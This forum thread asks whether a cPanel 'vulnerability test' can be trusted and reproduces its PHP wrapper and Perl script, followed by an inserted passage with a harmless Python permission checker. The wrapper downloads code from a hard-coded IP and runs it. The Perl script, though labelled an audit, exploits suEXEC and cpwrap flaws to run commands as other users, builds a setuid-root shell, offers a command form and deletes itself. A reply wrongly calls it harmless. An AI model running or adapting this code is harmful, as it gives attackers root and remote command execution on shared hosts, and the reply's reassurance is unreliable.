Full Version: Cpanel Vulnerability Test
damainman
Has anyone tried this test?

http://www.a-squad.com/audit/
cguimont
I am not sure I would trust this
parisdns
Me too

The code of cpanel.php:

<!--
# PROGRAM: cpanel.php
# AUTHORS: Rob Brown (rob@asquad.com)
# PURPOSE: Detect possible vulnerabilities
#
# DISCLAIMER:
# THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*.
# IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY.
# USE AT YOUR OWN RISK.
#
# For secure cpanel hosting, visit A-Squad.Com
-->

<?php
$tester = "/tmp/tests.pl";
if (!file_exists($tester)) {
$testw = fopen($tester, "w");
ini_set('user_agent',__FILE__);
$testr = fopen("http://206.71.87.80/tests.pl","r");
while ($s=fread($testr, 1024)) { fwrite($testw,$s); };
fclose($testw);
fclose($testr);
}
passthru("perl $tester '$QUERY_STRING' 2>&1");
?>



The code of http://206.71.87.80/tests.pl:

#!/usr/bin/perl -w
# PROGRAM: tests.pl
# AUTHORS: Rob Brown (rob@asquad.com)
# PURPOSE: Detect possible vulnerabilities
#
# USAGE: This script MUST be run from a php script
# in order for the tests to work correctly. (It
# will NOT work to execute this script directly
# from the browser because it's written in Perl.)
# See a-squad.com/audit for the php wrapper code.
#
# DISCLAIMER:
# THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*.
# IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY.
# USE AT YOUR OWN RISK.
#
# For secure cpanel hosting, visit A-Squad.Com

use strict;
use CGI ':standard';

if (my $query = shift) {
$ENV{QUERY_STRING} = $query;
$ENV{REQUEST_METHOD}="GET";
}
my $q = new CGI;

my @users = ();
my $me = "";
my $default_command = "id";
my $dummy = "/tmp/tests";

$| = 1;
print start_html("System Check");

my $action = "cpanel.php";
my $secure = 1;
my $locked = 1;
my $common = 0;
my $cpanel = 0;
my $canexe = 0;
my $cpwrap = 0;

print qq{<center><a href=http://www.a-squad.com/audit/><img src=http://www.asquad.com/Abanner.jpg border=0 alt="ADVERTISEMENT: A-Squad Certified Secure cPanel Hosting"></a></center>\n};
print "<ol>Performing white box security audit...\n";
if (-d "/usr/local/cpanel") {
chomp($cpanel = `/usr/local/cpanel/cpanel -V`);
print "<li><font color=green>PASSED</font>: cPanel INSTALLED ($cpanel)\n";
} else {
print "<li><font color=red>FAILED</font>: cPanel NOT INSTALLED\n";
print "<a href=http://www.a-squad.com/audit/explain1.html>Explain</a>\n";
}

my $uid = $<;
if ($uid < 500) {
print "<li><font color=red>FAILED</font>: Privileged UID Vulnerability Check ($uid)\n";
print "<a href=http://www.a-squad.com/audit/explain2.html>Explain</a>\n";
} else {
print "<li><font color=green>PASSED</font>: Privileged UID Vulnerability Check ($uid)\n";
}
if (my $nam = getpwuid $uid) {
if ($nam eq "nobody") {
print "<li><font color=red>FAILED</font>: nobody execution\n";
print "<a href=http://www.a-squad.com/audit/explain3.html>Explain</a>\n";
$secure = 0;
$common = 1;
} else {
print "<li><font color=green>PASSED</font>: User $nam ($uid) is probably not shared\n";
}
} else {
print "<li><font color=green>FAILED</font>: Privileged UID Vulnerability Check ($uid)\n";
}

$ENV{PWD} ||= `pwd`; chomp $ENV{PWD};
setpwent;
while (my ($name,$passwd,$uid,$gid,
$quota,$comment,$gcos,$dir) = getpwent) {
if ($uid >= 500) {
push @users, $name;
if ($ENV{PWD} =~ m%^\Q$dir\E/%) {
$me = $name;
$ENV{HOME} = $dir;
}
}
}

if ($me && $ENV{HOME} &&
-d $ENV{HOME}) {
my $mode = (stat _)[2];
if ($mode & 1) {
print "<li><font color=red>FAILED</font>: Stealth Snoop Vulnerability [$ENV{HOME}]\n";
print "<a href=http://www.a-squad.com/audit/explain4.html>Explain</a>\n";
$secure = 0;
$locked = 0;
} else {
print "<li><font color=green>PASSED</font>: Stealth Snoop Vulnerability [$ENV{HOME}]\n";
}
if ($mode & 4) {
print "<li><font color=red>FAILED</font>: Simple \$HOME Scanning [$ENV{HOME}]\n";
print "<a href=http://www.a-squad.com/audit/explain5.html>Explain</a>\n";
$secure = 0;
} else {
print "<li><font color=green>PASSED</font>: Simple \$HOME Scanning [$ENV{HOME}]\n";
}
if ($mode & 32) {
print "<li><font color=red>FAILED</font>: Group \$HOME Scanning [$ENV{HOME}]\n";
print "<a href=http://www.a-squad.com/audit/explain6.html>Explain</a>\n";
$secure = 0;
} else {
print "<li><font color=green>PASSED</font>: Group \$HOME Scanning [$ENV{HOME}]\n";
}
$mode = (stat "$ENV{HOME}/..")[2];
if ($mode & 4) {
print "<li><font color=red>FAILED</font>: Root /home scanning\n";
print "<a href=http://www.a-squad.com/audit/explain11.html>Explain</a>\n";
$secure = 0;
} else {
print "<li><font color=green>PASSED</font>: Root /home scanning\n";
}
$mode = (stat "$ENV{HOME}/public_html")[2];
if (!$locked && $mode & 1) {
print "<li><font color=red>FAILED</font>: Simple WEBROOT Protection\n";
print "<a href=http://www.a-squad.com/audit/explain7.html>Explain</a>\n";
} else {
print "<li><font color=green>PASSED</font>: Simple WEBROOT Protection\n";
}
my $pubg = (stat _)[5];
if (($common && !$locked and
$(==$pubg && ($mode & 8)) or
(!$locked && $mode & 1)) {
print "<li><font color=red>FAILED</font>: Real WEBROOT Protection\n";
print "<a href=http://www.a-squad.com/audit/explain8.html>Explain</a>\n";
$secure = 0;
} else {
print "<li><font color=green>PASSED</font>: Real WEBROOT Protection\n";
}
} else {
print "<li><font color=red>FAILED</font>: Unable to locate unprivileged homedir\n";
}

my $command = $q->param("command") || $default_command;
my $who = $q->param("username") || $me;
if ($cpanel && $common) {
print "<li><font color=green>PASSED</font>: CVE-2004-0490 <code>mod_phpsuexec</code> PATH_TRANSLATED Vulnerability Test\n";
if ($command and $who) {
my $wraptest = "/usr/local/cpanel/wrap";
$cpwrap = 1 if -x $wraptest && -u _;
if ($who eq "root") {
print "<li><font color=yellow><b>SKIPPED</b></font>: CVE-2004-0529 suEXEC <code>mod_php</code> Taint Vulnerability Test\n";
print "<a href=http://www.a-squad.com/audit/explain12.html>Explain</a>\n";
$canexe = $cpwrap;
} else {
mkdir $dummy, 0755;
chdir $dummy;
symlink("/usr/local/cpanel","cpanel");
my $dir = (getpwnam $who)[7];
open (DUMMY,">SafeFile.pm");
$ENV{HOME} = $dir;
print DUMMY qq{chdir "$dir";warn "\n";\nexec <<RUN$$;\n$command\nRUN$$\n};
close DUMMY;
my $out = `/usr/local/apache/bin/suexec $who $who cpanel/bin/proftpdvhosts 2>&1`;
if ($out =~ /^\n/) {
print "<li><font color=red><b>FAILED</b></font>: CVE-2004-0529 suEXEC <code>mod_php</code> Taint Vulnerability Test\n";
print "<a href=http://www.a-squad.com/audit/explain12.html>Explain</a>\n";
print "<pre>EXEC [$command] as [$who]:\n";
$out =~ s/&/&amp;/g;
$out =~ s/</&lt;/g;
print $out,"</pre>\n";
$canexe = 1;
} else {
print "<li><font color=green>PASSED</font>: CVE-2004-0529 suEXEC <code>mod_php</code> Taint Vulnerability Test\n";
print "<!--\nCOMPILE ERROR?\n$out-->\n" if $out;
}
}

if ($canexe) {
if (!$cpwrap) {
open (DUMMY,">wrap.c");
print DUMMY qq{int main() { initgroups("root",0);setgid(0);setuid(0);execl("/bin/sh","sh",0); }\n};
close DUMMY;
if (my $cc = `cc -o wrap wrap.c 2>&1`) {
print "<!--\nCOMPILE ERROR?\n$cc-->\n";
} else {
open (DUMMY,">SafeFile.pm");
print DUMMY qq{exec q{ cd /usr/local/cpanel;mv bin bin.ROOT;mkdir bin;echo 'install -o root -g wheel -m 04777 $dummy/wrap .' > bin/backupadmin;chmod 755 bin/backupadmin;bin.ROOT/backupwrap;rm bin/backupadmin;rmdir bin;mv bin.ROOT bin };\n};
close DUMMY;
my $out = `/usr/local/apache/bin/suexec cpanel cpanel cpanel/bin/proftpdvhosts 2>&1`;
}
}
$cpwrap = 1 if -x $wraptest && -u _;
}
chdir "/";
if ($cpwrap) {
print "<li><font color=red><b>FAILED</b></font>: CAN-2004-0546 cpwrap suid root Vulnerability Test\n";
print "<a href=http://www.a-squad.com/audit/explain13.html>Explain</a>\n";
push @users, "root";
if ($who eq "root") {
print "<pre>EXEC [$command] as [$who]:\n";
$ENV{EXEC} = $command;
my $out = `echo \$EXEC | $wraptest 2>&1`;
$out =~ s/&/&amp;/g;
$out =~ s/</&lt;/g;
print $out,"</pre>\n";
}
} else {
print "<li><font color=green>PASSED</font>: CAN-2004-0546 cpwrap suid root Vulnerability Test\n";
}
system("rm","-rf",$dummy);
}
} elsif ($cpanel && !$common) {
my $probe = `PATH_TRANSLATED=/usr/local/cpanel/base/phpinfo.php SCRIPT_FILENAME=/dev/null REQUEST_METHOD=GET /usr/bin/php 2>&1`;
if ($probe =~ /phpinfo()/) {
print "<li><font color=red><b>FAILED</b></font>: CVE-2004-0490 <code>mod_phpsuexec</code> PATH_TRANSLATED Vulnerability Test\n";
print "<a href=http://www.a-squad.com/audit/explain10.html>Explain</a>\n";
$canexe = 1;
$secure = 0;
print "<pre>EXEC [$command] as [$who]:\n";
my $out = `$command 2>&1`;
$out =~ s/&/&amp;/g;
$out =~ s/</&lt;/g;
print $out,"</pre>\n";
if ($who ne $me) {
print "Submit again to switch to another user...<br>\n";
my @guess = qw(/index.php /forum/index.php /forums/index.php);
my $rand = $guess[rand @guess];
$action = "/~$who$rand/~$me/cpanel.php";
system "chmod o+x $ENV{HOME}";
}
} else {
print "<li><font color=green>PASSED</font>: CVE-2004-0490 <code>mod_phpsuexec</code> PATH_TRANSLATED Vulnerability Test\n";
}
print "<li><font color=green>PASSED</font>: CVE-2004-0529 suEXEC <code>mod_php</code> Taint Vulnerability Test\n";
print "<li><font color=green>PASSED</font>: CAN-2004-0546 cpwrap suid root Vulnerability Test\n";
}
if ($cpanel) {
if ($secure) {
print "<li><font color=green>PASSED</font>: Congratulations, your cPanel configuration is secure!\n";
} else {
print "<li><font color=red>FAILED</font>: One or more insecure cPanel configurations were detected. Visit <a href=http://www.a-squad.com/>A-Squad.Com</a> for details on where to find more secure cPanel hosting.\n";
}
}
print "</ol>";
print
start_form(-method => "GET",-action => $action,-name=>"f"),
"Username: ",
popup_menu
(-name => "username",
-values => [ sort @users ],
-default => $who,
),
br,
"Password: (not required)",br,
"Command: ",
textfield(-name => "command",-value=> $command),
br,
submit(-value=> "Test Execution"),
end_form,
"\n<script>f.command.focus()</script>\n"
if $canexe;
print end_html;
-M$0>0.01&&unlink$0;
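
The read-only part of the posted tests.pl (the home-directory and public_html permission tests written as `$mode & 1`, `& 4`, `& 32` and `& 8`) can be reproduced locally without fetching or executing anything from a remote host. The following is an added example, not part of the original post or of the A-Squad script; the names `audit_home`, `demo`, `shared_web_user` and `web_gid` are assumptions made here, and the sample directory tree is constructed.

```python
import os
import stat
import tempfile

def audit_home(home, shared_web_user=False, web_gid=None):
    """Return {check name: True if it FAILS}, using the posted script's names."""
    home_mode = os.stat(home).st_mode
    parent_mode = os.stat(os.path.join(home, os.pardir)).st_mode
    locked = not home_mode & stat.S_IXOTH            # script: $mode & 1
    failed = {
        "Stealth Snoop Vulnerability": not locked,
        "Simple $HOME Scanning": bool(home_mode & stat.S_IROTH),   # $mode & 4
        "Group $HOME Scanning": bool(home_mode & stat.S_IRGRP),    # $mode & 32
        "Root /home scanning": bool(parent_mode & stat.S_IROTH),   # parent & 4
    }
    webroot = os.path.join(home, "public_html")
    if os.path.isdir(webroot):
        st = os.stat(webroot)
        other_x = bool(st.st_mode & stat.S_IXOTH)    # $mode & 1
        group_x = bool(st.st_mode & stat.S_IXGRP)    # $mode & 8
        failed["Simple WEBROOT Protection"] = not locked and other_x
        # Group execute only matters when PHP runs as a shared user
        # (the script's "nobody" case) whose group owns public_html.
        failed["Real WEBROOT Protection"] = bool(
            (shared_web_user and not locked
             and st.st_gid == web_gid and group_x)
            or (not locked and other_x))
    return failed

def demo(home_mode=0o711):
    """Constructed sample tree <tmp>/alice/public_html, modes set explicitly."""
    root = tempfile.mkdtemp()
    home = os.path.join(root, "alice")
    web = os.path.join(home, "public_html")
    os.makedirs(web)
    os.chmod(root, 0o755)
    os.chmod(web, 0o755)
    os.chmod(home, home_mode)
    return audit_home(home)

if __name__ == "__main__":
    # Print the failing checks for three common home-directory modes.
    for mode in (0o711, 0o750, 0o700):
        print(oct(mode), [k for k, v in demo(mode).items() if v])
```

To audit a real account, call `audit_home("/home/<user>")` from a shell on the server; pass `shared_web_user=True` and the web server's GID as `web_gid` when PHP runs as a shared user.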
dezignguy
While I haven't gone through the code with a fine-tooth comb... I didn't see anything that obviously jumped out to me as being malicious code. That script is being run as a non-privileged user too... (the webserver or the account of the domain it's run from). It shouldn't be able to do too much.

I think you risk more on the various rootkit scanners out now... those are run from root, with full access to everything, so you'd better trust those authors.